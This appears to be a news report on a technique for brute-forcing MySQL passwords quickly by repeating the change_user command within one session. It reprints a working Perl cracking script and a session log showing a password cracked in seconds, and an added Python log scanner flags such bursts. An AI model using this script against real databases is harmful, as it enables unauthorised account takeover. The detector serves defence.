A hacker by the name of Kingcope has found another security problem with the popular MySQL database. Using an already well-known characteristic of the database's user management, it is possible to significantly increase the speed of a brute-force attack. "Brute-forcing" typically involves trying a huge number of possible passwords in order to guess a user's actual password. Each password has to be presented to the login process, which takes time, and when thousands of passwords need to be tried, that time adds up.

What Kingcope has found is a trick that allows him to test up to 5000 passwords per second over the network, provided he already has some access to the database: the attacker needs an unprivileged account. The script logs in with that account and then issues the 'change_user' command to try to switch to another account within the same MySQL session. Unlike presenting each password to the login process, this reuses an already established network connection, and the server rejects incorrect passwords very quickly.

The hacker used the John the Ripper password cracker to generate the password candidates and has documented the attack with a Perl script and a record of a command-line session. Cracking a four-character password over remote access to the MySQL database took just 20 seconds, with over 100,000 character combinations tested.
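A defender-side counterpart to the change_user trick described above, added here as an example and not part of the article or of Kingcope's code: it scans MySQL general-log lines (general_log=ON, log_output=FILE; the text after "Change user" in the constructed sample is an assumption) and flags any connection that issues COM_CHANGE_USER far faster than an interactive client ever would.

```python
import re
from collections import defaultdict
from datetime import datetime
# Constructed sample of general-log lines (text after "Change user" is assumed);
# connection 7 issues four change_user commands within about a millisecond.
SAMPLE_LOG = """\
2012-12-02T10:00:00.000000Z\t    7 Connect\tuser@192.168.2.10 on test
2012-12-02T10:00:00.200000Z\t    7 Change user\tcrackme on test
2012-12-02T10:00:00.200300Z\t    7 Change user\tcrackme on test
2012-12-02T10:00:00.200600Z\t    7 Change user\tcrackme on test
2012-12-02T10:00:00.200900Z\t    7 Change user\tcrackme on test
2012-12-02T10:00:03.000000Z\t    9 Connect\tbob@192.168.2.11 on test
2012-12-02T10:00:04.000000Z\t    9 Change user\talice on test
2012-12-02T10:00:04.500000Z\t    9 Query\tselect 1
"""
LINE_RE = re.compile(r"^(?P<ts>\d{4}-\d\d-\d\dT\d\d:\d\d:\d\d\.\d+)Z?\s+"
                     r"(?P<conn>\d+)\s+(?P<cmd>Connect|Change user|Query|Quit)\b\s*(?P<arg>.*)$")

def parse_general_log(text):
    """Return (timestamp, connection id, command, argument) tuples for recognised lines."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%S.%f")
            events.append((ts, int(m["conn"]), m["cmd"], m["arg"].strip()))
    return events

def find_change_user_bursts(events, window_s=1.0, max_per_window=3):
    """Map connection id -> total change_user count for each connection that sent more
    than max_per_window COM_CHANGE_USER commands inside any window_s-second span."""
    by_conn = defaultdict(list)
    for ts, conn, cmd, _ in events:
        if cmd == "Change user":
            by_conn[conn].append(ts)
    hits = {}
    for conn, stamps in by_conn.items():
        stamps.sort()
        start = 0
        for end, ts in enumerate(stamps):  # sliding window over the sorted timestamps
            while (ts - stamps[start]).total_seconds() > window_s:
                start += 1
            if end - start + 1 > max_per_window:
                hits[conn] = len(stamps)
                break
    return hits

if __name__ == "__main__":
    for conn, n in find_change_user_bursts(parse_general_log(SAMPLE_LOG)).items():
        print(f"connection {conn}: {n} change_user attempts in a burst, likely password guessing")
```

The threshold is deliberately low: a legitimate client reauthenticates at most a few times per session, whereas the attack described above sends thousands of change_user commands per second on one connection.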

The example script

use Net::MySQL;

$|=1;    # autoflush output so a hit is printed immediately

# log in once with the known, unprivileged account
my $mysql = Net::MySQL->new(
    hostname => '192.168.2.3',
    database => 'test',
    user     => "user",
    password => "secret",
    debug    => 0,
);

$crackuser = "crackme";    # account whose password is being guessed

# one candidate password per line on standard input
while (<STDIN>) {
    chomp;
    $currentpass = $_;
    # user name, 0x14 (length of the 20-byte scramble), scrambled password, database
    $vv = join "\0",
        $crackuser,
        "\x14" .
        Net::MySQL::Password->scramble(
            $currentpass,
            $mysql->{salt},
            $mysql->{client_capabilities}
        ) . "\0";

    # 0x11 is COM_CHANGE_USER; a reply other than an error means the guess was right
    if ($mysql->_execute_command("\x11", $vv) ne undef) {
        print "[*] Cracked! --> $currentpass\n";
        exit;
    }
}

The example session

C:\Users\kingcope\Desktop>C:\Users\kingcope\Desktop\john179\run\john --incremental --stdout=5 | perl mysqlcrack.pl
Warning: MaxLen = 8 is too large for the current hash type, reduced to 5
words: 16382 time: 0:00:00:02 w/s: 6262 current: citcH
words: 24573 time: 0:00:00:04 w/s: 4916 current: rap
words: 40956 time: 0:00:00:07 w/s: 5498 current: matc3
words: 49147 time: 0:00:00:09 w/s: 5030 current: 4429
words: 65530 time: 0:00:00:12 w/s: 5354 current: ch141
words: 73721 time: 0:00:00:14 w/s: 5021 current: v3n
words: 90104 time: 0:00:00:17 w/s: 5277 current: pun2
[*] Cracked! --> pass
words: 98295 time: 0:00:00:18 w/s: 5434 current: 43gs
Session aborted

(djwm)